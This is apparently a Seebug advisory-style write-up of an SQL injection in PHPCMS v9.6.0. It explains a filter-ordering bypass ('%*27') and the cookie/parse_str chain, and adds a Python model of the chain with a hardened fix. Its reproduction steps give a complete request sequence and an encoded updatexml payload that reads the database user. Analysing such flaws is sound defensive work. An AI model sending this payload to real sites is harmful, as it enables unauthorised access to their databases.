PHPCMS v9 wap module SQL injection

ID SSV:92929
Type seebug
Reporter Zencri0er
Modified 2017-04-10T00:00:00


The suspicious function

1. In localhost/phpcms/modules/attachment/attachments.php, at line 241, the src variable submitted via GET is passed through the safe_replace function. Now let's go into this damn filter function and see what it actually does.

2. The filter function and its bypass

Starting at line 63 of localhost/phpcms/libs/functions/global.func.php you can see that an incoming %27 and %2527 are deleted, i.e. eaten by the program before they ever reach the database. But at line 67 you can see that it also eats *, and that is our way out: if we send %*27, the program has already finished looking for %27 by the time it removes the *, so what survives and is passed on is %27.

3. Where does the src variable end up?

Going back to the first screenshot: at line 241 src goes into the arr array, at line 243 arr is turned into a JSON string by json_encode, and at line 244 that JSON string is encrypted into a cookie. Here I made a bold assumption: src is injectable. So we pass the parameter src=%27 and updatexml(1,concat(1,(user())),1)%23; once JSON-encoded the incoming parameter ends up as {"src":"%27 and updatexml(1,concat(1,(user())),1)%23"}, and then the cookie is encrypted. I am not going to work out the encrypted cookie value here; readers can echo it themselves. Assume that for now; all of these operations take place inside the swfupload_json function.

down.php does the decoding for me

In localhost/phpcms/modules/content/down.php, line 14 decodes the a_k variable, so if we pass the encrypted SQL we just put into src as a_k, it decrypts it back into the JSON. Line 17 then parses that JSON string into variables with parse_str, splitting on & (giving id, m, f, modelid and catid), and what finally goes into SQL is: {"aid":1,"src":"&id=%27 and updatexml(1,concat(1,(user())),1)#&m=1&f=haha&modelid=2&catid=7&","filename":""}. Here you can see that the * from the earlier %*27 is gone, because the safety function ate it, and parse_str decodes the remaining %27 into a real quote. Finally, at line 26 id is passed into the SQL id field. If so then fine, let's try to reproduce it.
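To make the filter-ordering bypass and the decode-after-filter step concrete, here is an added Python model of the chain described above. It is not PHPCMS code: safe_replace, swfupload_json and down.php's init are re-implemented in Python, the sys_auth cookie encryption is left out because it is reversible and changes nothing in the logic, the exact str_replace list inside safe_replace and the table name in the query are assumptions, and the src values are constructed from the URL-decoded form of the src parameter (as PHP's $_GET['src'] sees it). hardened_query is an illustrative fix of my own, not the vendor's patch.

```python
"""Added model of the PHPCMS 9.6.0 src -> att_json cookie -> a_k -> parse_str chain.
Not PHPCMS code: the PHP functions are re-implemented in Python, sys_auth() cookie
encryption is left out (it is reversible and changes nothing below), and the exact
str_replace list in safe_replace() plus the table name are assumptions."""
import json
from urllib.parse import parse_qs


def safe_replace(s: str) -> str:
    """Model of global.func.php safe_replace(). The property the page relies on:
    '%27' and '%2527' are deleted before '*' is, so '%*27' passes the '%27'
    check untouched and only then collapses into '%27'."""
    for needle in ("%20", "%27", "%2527"):      # deleted first
        s = s.replace(needle, "")
    s = s.replace("*", "")                      # deleted afterwards: %*27 -> %27
    for needle in ("'", '"', ";", "{", "}", "\\"):  # assumption: literal quotes etc. are stripped too
        s = s.replace(needle, "")
    return s


def swfupload_json(aid: int, src: str, filename: str = "") -> str:
    """attachments.php swfupload_json(): filter src, json_encode the array and
    return the string that sys_auth() would encrypt into the att_json cookie."""
    arr = {"aid": int(aid), "src": safe_replace(src.strip()), "filename": filename}
    return json.dumps(arr, separators=(",", ":"))


def down_init(a_k: str) -> dict:
    """down.php init(): after sys_auth() DECODE, a_k is the JSON string above.
    parse_str() splits it on '&' and URL-decodes every value, so the surviving
    '%27' becomes a real single quote here, after all filtering is over."""
    params = {k: v[0] for k, v in parse_qs(a_k, keep_blank_values=True).items()}
    for required in ("m", "f", "modelid", "catid"):
        if not params.get(required):
            raise ValueError("illegal_parameters")
    return params


def vulnerable_query(params: dict) -> str:
    """get_one(array('id'=>$id)) quotes the value but does not escape it (model)."""
    return "SELECT * FROM `phpcms_news_data` WHERE `id` = '%s'" % params.get("id", "")


def hardened_query(params: dict):
    """Illustrative fix, not the vendor patch: id is an integer column, so accept
    only digits and bind the integer; anything else is rejected (None)."""
    raw = params.get("id", "")
    if not raw.isdigit():
        return None
    return "SELECT * FROM `phpcms_news_data` WHERE `id` = %d" % int(raw)


# Constructed inputs: the URL-decoded src parameter as PHP's $_GET['src'] sees it
# (%26 -> &, %20 -> space, %23 -> #; '%*27' is not a valid escape and stays as is).
BYPASS_SRC = "&id=%*27 and updatexml(1,concat(1,(user())),1)#&m=1&f=haha&modelid=2&catid=7&"
NAIVE_SRC = BYPASS_SRC.replace("%*27", "%27")   # what safe_replace() is designed to stop
QUOTE_SRC = BYPASS_SRC.replace("%*27", "'")     # a literal quote is stripped as well


def injected_id(src: str) -> str:
    """Run the whole chain and return the value that reaches the id field."""
    return down_init(swfupload_json(1, src))["id"]


if __name__ == "__main__":
    for label, src in (("%*27", BYPASS_SRC), ("%27", NAIVE_SRC), ("'", QUOTE_SRC)):
        print("%-5s -> %s" % (label, vulnerable_query(down_init(swfupload_json(1, src)))))
```

Running it shows only the %*27 variant closing the quoted id literal; the plain %27 and the literal quote are both eaten by safe_replace and stay inside the string. The general lesson is the one the page makes: a blacklist applied before decoding is only as strong as the order of its replacements, and the value should be typed (here, cast to an integer) at the point it enters the query.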

Reproducing the phpcms_v9.6.0 SQL injection

1. Access /index.php?m=wap&c=index&a=init&siteid=1 to obtain a cookie value. This damn value has to be passed along in the next step, otherwise the operation has no identity.

2. Copy that cookie value and submit it by POST as the userid_flash variable while accessing /index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28user%28%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26. Decoded, the SQL payload inside src is &id=%*27 and updatexml(1,concat(1,(user())),1)#&m=1&f=haha&modelid=2&catid=7&; the %*27 itself is sent as-is, not URL-encoded.

3. In the previous step we already got the SQL, JSON-encoded and encrypted, into a cookie, because the response returns the cookie containing the encrypted SQL payload. Now we pass that value to the a_k variable and see exactly what happens.